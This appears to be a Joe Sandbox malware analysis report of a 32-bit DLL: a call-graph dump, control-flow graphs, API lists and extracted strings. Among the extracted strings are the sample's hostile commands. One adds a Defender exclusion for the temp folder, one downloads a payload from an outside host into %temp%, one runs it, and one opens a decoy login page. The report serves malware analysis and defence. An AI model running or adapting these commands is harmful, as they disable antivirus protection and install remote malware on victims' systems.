16596->16597 16598 6d40453e 16597->16598 16599 6d405856 std::_Lockit::_Lockit 7 API calls 16598->16599 16603 6d404580 __DllMainCRTStartup@12 16598->16603 16600 6d404560 16599->16600 16604 6d4058ae std::_Lockit::~_Lockit 2 API calls 16600->16604 16601 6d4045c5 16602 6d4058ae std::_Lockit::~_Lockit 2 API calls 16601->16602 16605 6d40464d 16602->16605 16603->16601 16607 6d407b01 codecvt 28 API calls 16603->16607 16604->16603 16606 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16605->16606 16608 6d404666 16606->16608 16609 6d4045d0 16607->16609 16617 6d405220 16608->16617 16610 6d401a30 codecvt 73 API calls 16609->16610 16611 6d404600 16610->16611 16625 6d405de3 16611->16625 16614 6d401ae0 codecvt 71 API calls 16615 6d404628 16614->16615 16616 6d405b9c std::_Facet_Register 28 API calls 16615->16616 16616->16601 16619 6d405267 16617->16619 16618 6d405282 16621 6d401f30 std::ios_base::_Init 28 API calls 16618->16621 16619->16618 16620 6d4042c0 __DllMainCRTStartup@12 28 API calls 16619->16620 16620->16618 16622 6d405368 16621->16622 16623 6d404997 16622->16623 16624 6d404380 __DllMainCRTStartup@12 28 API calls 16622->16624 16623->16066 16624->16623 16637 6d40d90c 16625->16637 16627 6d405dec __Getctype 16628 6d405e24 16627->16628 16629 6d405e06 16627->16629 16630 6d40d75a __Getctype 39 API calls 16628->16630 16642 6d40d75a 16629->16642 16632 6d405e0d 16630->16632 16647 6d40d933 16632->16647 16635 6d404616 16635->16614 16638 6d411f56 _unexpected 39 API calls 16637->16638 16639 6d40d917 16638->16639 16662 6d41219d 16639->16662 16643 6d411f56 _unexpected 39 API calls 16642->16643 16644 6d40d765 16643->16644 16645 6d41219d __Getctype 39 API calls 16644->16645 16646 6d40d775 16645->16646 16646->16632 16648 6d411f56 _unexpected 39 API calls 16647->16648 16649 6d40d93e 16648->16649 16650 6d41219d __Getctype 39 API calls 16649->16650 16651 6d405e35 16650->16651 16651->16635 16652 6d40dd4c 16651->16652 16653 6d40dd57 16652->16653 16654 6d40dd5b 16652->16654 16653->16635 16655 6d40d4bd ___std_exception_copy 21 API calls 16654->16655 16656 6d40dd80 16655->16656 16657 6d40dd87 16656->16657 16731 6d415e80 16656->16731 16657->16635 16660 6d40d352 __Getctype 11 API calls 16661 6d40ddac 16660->16661 16663 6d4121b0 16662->16663 16664 6d40d927 16662->16664 16663->16664 16666 6d41abe3 16663->16666 16664->16627 16667 6d41abef ___scrt_is_nonwritable_in_current_image 16666->16667 16668 6d411f56 _unexpected 39 API calls 16667->16668 16669 6d41abf8 16668->16669 16670 6d41ac46 _Fputc 16669->16670 16678 6d40d447 EnterCriticalSection 16669->16678 16670->16664 16672 6d41ac16 16679 6d41ac5a 16672->16679 16678->16672 16680 6d41ac2a 16679->16680 16681 6d41ac68 __Getctype 16679->16681 16683 6d41ac49 16680->16683 16681->16680 16682 6d41a996 __Getctype 20 API calls 16681->16682 16682->16680 16697 6d40d48f LeaveCriticalSection 16683->16697 16685 6d41ac3d 16685->16670 16686 6d40f989 16685->16686 16698 6d419545 16686->16698 16689 6d40f999 16691 6d40f9a3 IsProcessorFeaturePresent 16689->16691 16696 6d40f9c2 16689->16696 16693 6d40f9af 16691->16693 16695 6d40d160 __InternalCxxFrameHandler 8 API calls 16693->16695 16695->16696 16728 6d4103e5 16696->16728 16697->16685 16699 6d419481 __InternalCxxFrameHandler EnterCriticalSection LeaveCriticalSection 16698->16699 16700 6d40f98e 16699->16700 16700->16689 16701 6d419595 16700->16701 16702 6d4195a1 _unexpected 16701->16702 16703 6d4195c8 __InternalCxxFrameHandler 16702->16703 16704 6d4120a4 _free 20 API calls 16702->16704 16709 6d4195ce __InternalCxxFrameHandler 16702->16709 16705 6d419613 16703->16705 16703->16709 16727 6d4195fd 16703->16727 16704->16703 16706 6d40de26 _free 20 API calls 16705->16706 16707 6d419618 16706->16707 16708 6d40d325 _Fputc 26 API calls 16707->16708 16708->16727 16712 6d40d447 std::_Lockit::_Lockit EnterCriticalSection 16709->16712 16713 6d41963f 16709->16713 16710 6d420300 __InternalCxxFrameHandler 5 API calls 16711 6d41978a 16710->16711 16711->16689 16712->16713 16714 6d419699 16713->16714 16716 6d419691 16713->16716 16718 6d40d48f std::_Lockit::~_Lockit LeaveCriticalSection 16713->16718 16724 6d4196c4 16713->16724 16720 6d41958c __InternalCxxFrameHandler 39 API calls 16714->16720 16714->16724 16715 6d419743 __InternalCxxFrameHandler LeaveCriticalSection 16717 6d419718 16715->16717 16719 6d4103e5 __InternalCxxFrameHandler 29 API calls 16716->16719 16721 6d411f56 _unexpected 39 API calls 16717->16721 16725 6d419727 16717->16725 16717->16727 16718->16716 16719->16714 16722 6d4196ba 16720->16722 16721->16725 16723 6d41958c __InternalCxxFrameHandler 39 API calls 16722->16723 16723->16724 16724->16715 16726 6d411f56 _unexpected 39 API calls 16725->16726 16725->16727 16726->16727 16727->16710 16729 6d410271 __InternalCxxFrameHandler 29 API calls 16728->16729 16730 6d40f9cc 16729->16730 16732 6d415e9b 16731->16732 16733 6d415e8d 16731->16733 16734 6d40de26 _free 20 API calls 16732->16734 16733->16732 16738 6d415eb4 16733->16738 16735 6d415ea5 16734->16735 16736 6d40d325 _Fputc 26 API calls 16735->16736 16737 6d40dd95 16736->16737 16737->16657 16737->16660 16738->16737 16739 6d40de26 _free 20 API calls 16738->16739 16739->16735 16741 6d402054 __cftof 16740->16741 16748 6d4020be 16741->16748 16820 6d4054b0 16741->16820 16743 6d402138 CreateProcessW 16744 6d402170 GetLastError 16743->16744 16745 6d4021a3 WaitForSingleObject CloseHandle CloseHandle 16743->16745 16746 6d404670 __DllMainCRTStartup@12 28 API calls 16744->16746 16747 6d402197 16745->16747 16749 6d402187 16746->16749 16750 6d4021fa error_info_injector 16747->16750 16755 6d402228 16747->16755 16748->16743 16838 6d405650 16748->16838 16853 6d402790 16749->16853 16753 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16750->16753 16756 6d402221 16753->16756 16757 6d40d335 std::ios_base::_Init 26 API calls 16755->16757 16756->16082 16759 6d40222d 16757->16759 16758 6d404910 __DllMainCRTStartup@12 74 API calls 16758->16747 16760 6d403550 std::ios_base::_Init 28 API calls 16759->16760 16761 6d402280 16760->16761 16762 6d403550 std::ios_base::_Init 28 API calls 16761->16762 16763 6d4022af 16762->16763 16764 6d403550 std::ios_base::_Init 28 API calls 16763->16764 16765 6d4022db 16764->16765 16766 6d403550 std::ios_base::_Init 28 API calls 16765->16766 16767 6d402307 16766->16767 16768 6d404670 __DllMainCRTStartup@12 28 API calls 16767->16768 16769 6d40231a 16768->16769 16770 6d404910 __DllMainCRTStartup@12 74 API calls 16769->16770 16771 6d402320 16770->16771 16772 6d402000 __DllMainCRTStartup@12 78 API calls 16771->16772 16773 6d40232b 16772->16773 16774 6d404670 __DllMainCRTStartup@12 28 API calls 16773->16774 16775 6d40233a 16774->16775 16776 6d404910 __DllMainCRTStartup@12 74 API calls 16775->16776 16777 6d402340 Sleep 16776->16777 16778 6d402000 __DllMainCRTStartup@12 78 API calls 16777->16778 16779 6d402356 16778->16779 16780 6d404670 __DllMainCRTStartup@12 28 API calls 16779->16780 16781 6d402365 16780->16781 16782 6d404910 __DllMainCRTStartup@12 74 API calls 16781->16782 16783 6d40236b Sleep 16782->16783 16784 6d402000 __DllMainCRTStartup@12 78 API calls 16783->16784 16785 6d402381 16784->16785 16786 6d404670 __DllMainCRTStartup@12 28 API calls 16785->16786 16787 6d402390 16786->16787 16788 6d404910 __DllMainCRTStartup@12 74 API calls 16787->16788 16790 6d402396 error_info_injector 16788->16790 16789 6d4024b0 16792 6d40d335 std::ios_base::_Init 26 API calls 16789->16792 16790->16789 16791 6d40248d error_info_injector 16790->16791 16793 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16791->16793 16794 6d4024b5 16792->16794 16795 6d4024ac 16793->16795 16796 6d4025cb 16794->16796 16797 6d4011c0 __DllMainCRTStartup@12 2 API calls 16794->16797 16795->16082 16796->16082 16798 6d4024df 16797->16798 16799 6d4011c0 __DllMainCRTStartup@12 2 API calls 16798->16799 16802 6d4024f3 16799->16802 16800 6d402547 16801 6d4011c0 __DllMainCRTStartup@12 2 API calls 16800->16801 16803 6d40255a 16801->16803 16802->16800 16804 6d4011c0 __DllMainCRTStartup@12 2 API calls 16802->16804 16805 6d404670 __DllMainCRTStartup@12 28 API calls 16803->16805 16804->16802 16806 6d40256b 16805->16806 16807 6d4025e0 __DllMainCRTStartup@12 74 API calls 16806->16807 16808 6d402572 16807->16808 16809 6d404910 __DllMainCRTStartup@12 74 API calls 16808->16809 16810 6d402578 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16809->16810 16811 6d404670 __DllMainCRTStartup@12 28 API calls 16810->16811 16812 6d4025aa 16811->16812 16813 6d4025e0 __DllMainCRTStartup@12 74 API calls 16812->16813 16814 6d4025b1 16813->16814 16815 6d404670 __DllMainCRTStartup@12 28 API calls 16814->16815 16816 6d4025bd 16815->16816 16817 6d404910 __DllMainCRTStartup@12 74 API calls 16816->16817 16818 6d4025c3 16817->16818 16819 6d402230 __DllMainCRTStartup@12 78 API calls 16818->16819 16819->16796 16821 6d4055e1 16820->16821 16824 6d4054d5 16820->16824 16822 6d401440 std::ios_base::_Init 28 API calls 16821->16822 16833 6d40553b _Yarn 16822->16833 16823 6d40d335 std::ios_base::_Init 26 API calls 16832 6d4055eb 16823->16832 16825 6d4055dc 16824->16825 16827 6d405551 16824->16827 16828 6d40552a 16824->16828 16826 6d401370 Concurrency::cancel_current_task 28 API calls 16825->16826 16826->16821 16830 6d407b01 codecvt 28 API calls 16827->16830 16827->16833 16828->16825 16829 6d405535 16828->16829 16831 6d407b01 codecvt 28 API calls 16829->16831 16830->16833 16831->16833 16834 6d405620 error_info_injector 16832->16834 16835 6d40d335 std::ios_base::_Init 26 API calls 16832->16835 16833->16823 16837 6d4055ac _Yarn error_info_injector 16833->16837 16834->16748 16836 6d405646 16835->16836 16837->16748 16839 6d4057a1 16838->16839 16842 6d405673 16838->16842 16840 6d401440 std::ios_base::_Init 28 API calls 16839->16840 16851 6d4056d4 _Yarn 16840->16851 16841 6d40d335 std::ios_base::_Init 26 API calls 16845 6d4057ab 16841->16845 16843 6d40579c 16842->16843 16846 6d4056c3 16842->16846 16847 6d4056ed 16842->16847 16844 6d401370 Concurrency::cancel_current_task 28 API calls 16843->16844 16844->16839 16846->16843 16848 6d4056ce 16846->16848 16849 6d407b01 codecvt 28 API calls 16847->16849 16847->16851 16850 6d407b01 codecvt 28 API calls 16848->16850 16849->16851 16850->16851 16851->16841 16852 6d40575c _Yarn error_info_injector 16851->16852 16852->16748 16854 6d4027d5 16853->16854 16855 6d4027f0 16854->16855 16856 6d4042c0 __DllMainCRTStartup@12 28 API calls 16854->16856 16858 6d4049b0 __DllMainCRTStartup@12 74 API calls 16855->16858 16859 6d402846 16855->16859 16856->16855 16857 6d401f30 std::ios_base::_Init 28 API calls 16861 6d4028ef 16857->16861 16858->16859 16859->16857 16860 6d402191 16860->16758 16861->16860 16862 6d404380 __DllMainCRTStartup@12 28 API calls 16861->16862 16862->16860 16877 6d41090a 16863->16877 16865 6d408057 16865->15506 16867 6d41027f 16866->16867 16876 6d410290 16866->16876 16896 6d410319 GetModuleHandleW 16867->16896 16905 6d41013f 16876->16905 16878 6d410916 ___scrt_is_nonwritable_in_current_image 16877->16878 16885 6d40d447 EnterCriticalSection 16878->16885 16880 6d410924 16886 6d410b0c 16880->16886 16884 6d410942 _Fputc 16884->16865 16885->16880 16889 6d410b2c 16886->16889 16891 6d410b34 16886->16891 16887 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16888 6d410931 16887->16888 16892 6d41094f 16888->16892 16889->16887 16890 6d411902 _free 20 API calls 16890->16889 16891->16889 16891->16890 16895 6d40d48f LeaveCriticalSection 16892->16895 16894 6d410959 16894->16884 16895->16894 16897 6d410284 16896->16897 16897->16876 16898 6d41035d GetModuleHandleExW 16897->16898 16899 6d410387 GetProcAddress 16898->16899 16904 6d41039c 16898->16904 16899->16904 16900 6d4103b0 FreeLibrary 16901 6d4103b9 16900->16901 16902 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16901->16902 16903 6d4103c3 16902->16903 16903->16876 16904->16900 16904->16901 16906 6d41014b ___scrt_is_nonwritable_in_current_image 16905->16906 16921 6d40d447 EnterCriticalSection 16906->16921 16908 6d410155 16922 6d410182 16908->16922 16921->16908 16924 6d41018e _unexpected 16922->16924 16926 6d4101fb 16924->16926 16928 6d410c46 __DllMainCRTStartup@12 20 API calls 16924->16928 16931 6d410229 16924->16931 16927 6d410218 16926->16927 16929 6d40ff0b __InternalCxxFrameHandler 5 API calls 16926->16929 16930 6d40ff0b __InternalCxxFrameHandler 5 API calls 16927->16930 16928->16926 16929->16927 16930->16931 16935 6d420300 16931->16935 16936 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16935->16936 16937 6d42030a 16936->16937 16937->16937 16950 6d40a92e 16948->16950 16951 6d408640 16948->16951 16949 6d40d143 ___std_exception_copy 20 API calls 16949->16950 16950->16949 16950->16951 16951->15510 16953 6d410e23 16952->16953 16954 6d410e35 16952->16954 16955 6d410e31 16953->16955 16959 6d40e381 16953->16959 16962 6d41a817 16954->16962 16955->16032 16966 6d40e233 16959->16966 16965 6d41a830 16962->16965 16963 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16964 6d410e44 16963->16964 16964->16032 16965->16963 16969 6d40e13b 16966->16969 16968 6d40e272 16968->16955 16970 6d40e147 ___scrt_is_nonwritable_in_current_image 16969->16970 16977 6d40d447 EnterCriticalSection 16970->16977 16972 6d40e1bd 16986 6d40e1d1 16972->16986 16973 6d40e151 ___scrt_uninitialize_crt 16973->16972 16978 6d40e0ba 16973->16978 16975 6d40e1c9 _Fputc 16975->16968 16977->16973 16979 6d40e0c6 ___scrt_is_nonwritable_in_current_image 16978->16979 16989 6d40dfa3 EnterCriticalSection 16979->16989 16981 6d40e0d0 ___scrt_uninitialize_crt 16982 6d40e108 16981->16982 16990 6d40e33a 16981->16990 17000 6d40e12f 16982->17000 16985 6d40e127 _Fputc 16985->16973 17067 6d40d48f LeaveCriticalSection 16986->17067 16988 6d40e1db 16988->16975 16989->16981 16991 6d40e350 16990->16991 16992 6d40e347 16990->16992 17003 6d40e2d7 16991->17003 16994 6d40e233 ___scrt_uninitialize_crt 68 API calls 16992->16994 16995 6d40e34d 16994->16995 16995->16982 16998 6d40e370 17016 6d416242 16998->17016 17066 6d40dfb7 LeaveCriticalSection 17000->17066 17002 6d40e139 17002->16985 17004 6d40e2ee 17003->17004 17008 6d40e313 17003->17008 17005 6d412bf6 _Fputc 26 API calls 17004->17005 17004->17008 17006 6d40e30c 17005->17006 17027 6d416862 17006->17027 17008->16995 17009 6d412bf6 17008->17009 17010 6d412c02 17009->17010 17011 6d412c17 17009->17011 17012 6d40de26 _free 20 API calls 17010->17012 17011->16998 17013 6d412c07 17012->17013 17014 6d40d325 _Fputc 26 API calls 17013->17014 17015 6d412c12 17014->17015 17015->16998 17017 6d416260 17016->17017 17018 6d416253 17016->17018 17020 6d4162a9 17017->17020 17023 6d416287 17017->17023 17019 6d40de26 _free 20 API calls 17018->17019 17025 6d416258 17019->17025 17021 6d40de26 _free 20 API calls 17020->17021 17022 6d4162ae 17021->17022 17024 6d40d325 _Fputc 26 API calls 17022->17024 17052 6d4161aa 17023->17052 17024->17025 17025->16995 17028 6d41686e ___scrt_is_nonwritable_in_current_image 17027->17028 17029 6d416876 17028->17029 17030 6d41688e 17028->17030 17031 6d40de13 __dosmaperr 20 API calls 17029->17031 17032 6d416929 17030->17032 17035 6d4168c0 17030->17035 17034 6d41687b 17031->17034 17033 6d40de13 __dosmaperr 20 API calls 17032->17033 17036 6d41692e 17033->17036 17037 6d40de26 _free 20 API calls 17034->17037 17038 6d41e1fc ___scrt_uninitialize_crt EnterCriticalSection 17035->17038 17039 6d40de26 _free 20 API calls 17036->17039 17046 6d416883 _Fputc 17037->17046 17040 6d4168c6 17038->17040 17041 6d416936 17039->17041 17042 6d4168e2 17040->17042 17043 6d4168f7 17040->17043 17044 6d40d325 _Fputc 26 API calls 17041->17044 17045 6d40de26 _free 20 API calls 17042->17045 17047 6d41694a ___scrt_uninitialize_crt 62 API calls 17043->17047 17044->17046 17048 6d4168e7 17045->17048 17046->17008 17049 6d4168f2 17047->17049 17050 6d40de13 __dosmaperr 20 API calls 17048->17050 17051 6d416921 ___scrt_uninitialize_crt LeaveCriticalSection 17049->17051 17050->17049 17051->17046 17053 6d4161b6 ___scrt_is_nonwritable_in_current_image 17052->17053 17054 6d41e1fc ___scrt_uninitialize_crt EnterCriticalSection 17053->17054 17055 6d4161c5 17054->17055 17056 6d41620c 17055->17056 17057 6d41e2d3 __fread_nolock 26 API calls 17055->17057 17058 6d40de26 _free 20 API calls 17056->17058 17059 6d4161f1 FlushFileBuffers 17057->17059 17060 6d416211 17058->17060 17059->17060 17061 6d4161fd 17059->17061 17063 6d416236 ___scrt_uninitialize_crt LeaveCriticalSection 17060->17063 17062 6d40de13 __dosmaperr 20 API calls 17061->17062 17064 6d416202 GetLastError 17062->17064 17065 6d416229 _Fputc 17063->17065 17064->17056 17065->17025 17066->17002 17067->16988 17073 6d410e48 17068->17073 17071 6d40aa9d ___vcrt_uninitialize_ptd 6 API calls 17072 6d407d37 17071->17072 17072->15500 17076 6d412183 17073->17076 17077 6d40806e 17076->17077 17078 6d41218d 17076->17078 17077->17071 17080 6d414dec 17078->17080 17081 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 17080->17081 17082 6d414e13 17081->17082 17083 6d414e2b TlsFree 17082->17083 17084 6d414e1f 17082->17084 17083->17084 17085 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 17084->17085 17086 6d414e3c 17085->17086 17086->17077 19321 6d41a78b 19322 6d41a7b1 19321->19322 19325 6d41a7ad 19321->19325 19322->19325 19326 6d413f12 2 API calls 19322->19326 19323 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19324 6d41a813 19323->19324 19325->19323 19326->19322

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 6d402000-6d40207b call 6d409660 3 6d402083-6d402085 0->3 4 6d40207d-6d402081 0->4 5 6d402087-6d4020a7 3->5 4->5 6 6d4020c6-6d4020d8 5->6 7 6d4020a9-6d4020c3 call 6d4054b0 5->7 9 6d402138-6d40216e CreateProcessW 6->9 10 6d4020da 6->10 7->6 13 6d402170-6d4021a1 GetLastError call 6d404670 call 6d402790 call 6d404910 9->13 14 6d4021a3-6d4021c7 WaitForSingleObject CloseHandle * 2 9->14 12 6d4020e0-6d4020ef 10->12 17 6d4020f1-6d402112 12->17 18 6d402114-6d402126 call 6d405650 12->18 16 6d4021ce-6d4021d4 13->16 14->16 20 6d402204-6d402227 call 6d407ac2 16->20 21 6d4021d6-6d4021e8 16->21 22 6d40212b-6d402131 17->22 18->22 25 6d4021fa-6d402201 call 6d407ad0 21->25 26 6d4021ea-6d4021f8 21->26 22->9 27 6d402133-6d402136 22->27 25->20 26->25 30 6d402228-6d40239f call 6d40d335 call 6d403550 * 4 call 6d404670 call 6d404910 call 6d402000 call 6d404670 call 6d404910 Sleep call 6d402000 call 6d404670 call 6d404910 Sleep call 6d402000 call 6d404670 call 6d404910 26->30 27->12 69 6d4023a1-6d4023ad 30->69 70 6d4023cd-6d4023e5 30->70 71 6d4023c3-6d4023ca call 6d407ad0 69->71 72 6d4023af-6d4023bd 69->72 73 6d402413-6d40242b 70->73 74 6d4023e7-6d4023f3 70->74 71->70 72->71 75 6d4024b0-6d4024d0 call 6d40d335 72->75 79 6d402455-6d40246d 73->79 80 6d40242d-6d402439 73->80 77 6d4023f5-6d402403 74->77 78 6d402409-6d402410 call 6d407ad0 74->78 98 6d4024d6-6d402503 call 6d4011c0 * 2 75->98 99 6d4025cb-6d4025d6 75->99 77->75 77->78 78->73 81 6d402497-6d4024af call 6d407ac2 79->81 82 6d40246f-6d40247b 79->82 86 6d40244b-6d402452 call 6d407ad0 80->86 87 6d40243b-6d402449 80->87 89 6d40248d-6d402494 call 6d407ad0 82->89 90 6d40247d-6d40248b 82->90 86->79 87->75 87->86 89->81 90->75 90->89 105 6d402505 98->105 106 6d402549-6d40254d 98->106 108 6d402507-6d40250d 105->108 109 6d40250f-6d402513 105->109 107 6d402551-6d4025c6 call 6d4011c0 call 6d404670 call 6d4025e0 call 6d404910 call 6d4203f0 call 6d404670 call 6d4025e0 call 6d404670 call 6d404910 call 6d402230 106->107 107->99 108->106 108->109 111 6d402517-6d40253b call 6d4011c0 109->111 116 6d40253d 111->116 116->107 118 6d40253f-6d402545 116->118 118->111 120 6d402547 118->120 120->107
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000200,00000000,00000000,?,?,189157A1,?,00000000), ref: 6D402166
                                                                                                      • GetLastError.KERNEL32 ref: 6D402170
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D4021AB
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6D4021BD
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6D4021C5
                                                                                                      • Sleep.KERNELBASE(000005DC,?,189157A1), ref: 6D402348
                                                                                                      • Sleep.KERNELBASE(00003A98,?,?,189157A1), ref: 6D402373
                                                                                                      Strings
                                                                                                      • .Wu, xrefs: 6D4021B7
                                                                                                      • cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", xrefs: 6D402293
                                                                                                      • Process launched successfully., xrefs: 6D402307, 6D40232B, 6D402356, 6D402381
                                                                                                      • Time taken: , xrefs: 6D40259B
                                                                                                      • cmd /c %temp%/eryy65ty.exe, xrefs: 6D4022EB
                                                                                                      • cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, xrefs: 6D4022BF
                                                                                                      • CreateProcess failed: , xrefs: 6D402178
                                                                                                      • powershell start-process https://digify.com/a/#/access/login, xrefs: 6D402264
                                                                                                      • seconds., xrefs: 6D4025B1
                                                                                                      • Calculated sum of squares for 5 seconds: , xrefs: 6D40255C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep$CreateErrorLastObjectProcessSingleWait
                                                                                                      • String ID: seconds.$Calculated sum of squares for 5 seconds: $CreateProcess failed: $Process launched successfully.$Time taken: $cmd /c %temp%/eryy65ty.exe$cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"$cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe$powershell start-process https://digify.com/a/#/access/login$.Wu
                                                                                                      • API String ID: 1028668984-3980233284
                                                                                                      • Opcode ID: e86db026ad2503a099e5a94e5722619f37dac8ecae27a1baa46c671bf83e5c7b
                                                                                                      • Instruction ID: f0510d60e43d4847a45b69f49522af5a65895a452d51c6f809298bed663dfa51
                                                                                                      • Opcode Fuzzy Hash: e86db026ad2503a099e5a94e5722619f37dac8ecae27a1baa46c671bf83e5c7b
                                                                                                      • Instruction Fuzzy Hash: 95F1F670E042449BDB14DFB8CC84FAEBBB5EF85308F10852DE515AB2C5DB35AD458BA2

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D403550: Concurrency::cancel_current_task.LIBCPMT ref: 6D403683
                                                                                                      • Sleep.KERNELBASE(000005DC,?,189157A1), ref: 6D402348
                                                                                                        • Part of subcall function 6D402000: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000200,00000000,00000000,?,?,189157A1,?,00000000), ref: 6D402166
                                                                                                        • Part of subcall function 6D402000: GetLastError.KERNEL32 ref: 6D402170
                                                                                                      • Sleep.KERNELBASE(00003A98,?,?,189157A1), ref: 6D402373
                                                                                                        • Part of subcall function 6D402000: WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D4021AB
                                                                                                        • Part of subcall function 6D402000: CloseHandle.KERNEL32(?), ref: 6D4021BD
                                                                                                        • Part of subcall function 6D402000: CloseHandle.KERNEL32(?), ref: 6D4021C5
                                                                                                      Strings
                                                                                                      • cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp", xrefs: 6D402293
                                                                                                      • Process launched successfully., xrefs: 6D402307, 6D40232B, 6D402356, 6D402381
                                                                                                      • cmd /c %temp%/eryy65ty.exe, xrefs: 6D4022EB
                                                                                                      • cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe, xrefs: 6D4022BF
                                                                                                      • powershell start-process https://digify.com/a/#/access/login, xrefs: 6D402264
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep$Concurrency::cancel_current_taskCreateErrorLastObjectProcessSingleWait
                                                                                                      • String ID: Process launched successfully.$cmd /c %temp%/eryy65ty.exe$cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"$cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe$powershell start-process https://digify.com/a/#/access/login
                                                                                                      • API String ID: 4171290658-3657197600
                                                                                                      • Opcode ID: 35e6b40866af5c6e202eea67c3d57f9c04032dcbffa132a7537a57bcd63ec556
                                                                                                      • Instruction ID: bbcf3b3ceca1231cfe6085289a43d835706f5ec413d54450eae75011accd8f3f
                                                                                                      • Opcode Fuzzy Hash: 35e6b40866af5c6e202eea67c3d57f9c04032dcbffa132a7537a57bcd63ec556
                                                                                                      • Instruction Fuzzy Hash: C561B470A041489BEB14DFA4DC94FAEBB75AF46308F24812CD105BB3C5DB799E858B92

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __RTC_Initialize.LIBCMT ref: 6D407CD7
                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 6D407CF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                      • String ID:
                                                                                                      • API String ID: 2442719207-0
                                                                                                      • Opcode ID: 2698efe2d6cd899a7fbbe0eeba451dcb715d0ce75db1afae84146312e2a72b0c
                                                                                                      • Instruction ID: fe0ce2df2b2f78f07d3eaa73e73f4483e7a71e3d436dc73d1d57a1b3c000ed30
                                                                                                      • Opcode Fuzzy Hash: 2698efe2d6cd899a7fbbe0eeba451dcb715d0ce75db1afae84146312e2a72b0c
                                                                                                      • Instruction Fuzzy Hash: 1041B072D0D655AFDB21DF69C840FBE3A75EF81758F228139EA1467250D7308D029BE2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
